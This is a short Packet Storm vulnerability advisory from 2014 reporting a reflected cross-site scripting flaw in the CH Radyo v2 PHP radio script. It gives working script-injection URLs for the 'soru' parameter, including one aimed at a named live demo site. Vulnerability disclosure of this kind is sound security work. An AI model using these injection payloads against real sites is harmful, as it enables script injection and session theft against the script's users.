CH Radyo 2 Cross Site Scripting

2014-05-04T00:00:00
ID PACKETSTORM:126467
Type packetstorm
Reporter kurdish hackers team
Modified 2014-05-04T00:00:00

Description

                                        
                                            `=====================================================  
CH Radyo v.2 php script Cross Site Scripting Vulnerability  
-----------------------------------------------------------  
foun by :kurdish hackers team  
group : kurd-team  
contact : pshela@yahoo.com  
site : kurdteam.org  
-----------------------------------------------------------  
------------------------script-----------------------------  
-----------------------------------------------------------  
prich :59 TL (turkish mony)  
prich  
from:http://www.scripti.org/script_ch-radyo-scripti_3292_27.html  
demo script :http://radyo1.indircen.com  
(tested by Maxthon Cloud Browser , firefox)  
  
-----------------------------------------------------------  
Exploit:  
-------  
site.com/path/index.html?soru="><script>alert('explo3ter')</script>  
site.com/path/mplayer/index.html?soru="><script>alert('explo3ter')</script>  
-------  
demo :  
http://radyo1.indircen.com/mplayer/index.html?soru="><script>alert('explo3ter')</script>  
-----------------------------------------------------------  
Zryan_kurd ,hamw andamani p4kurd.com  
-----------------------------------------------------------`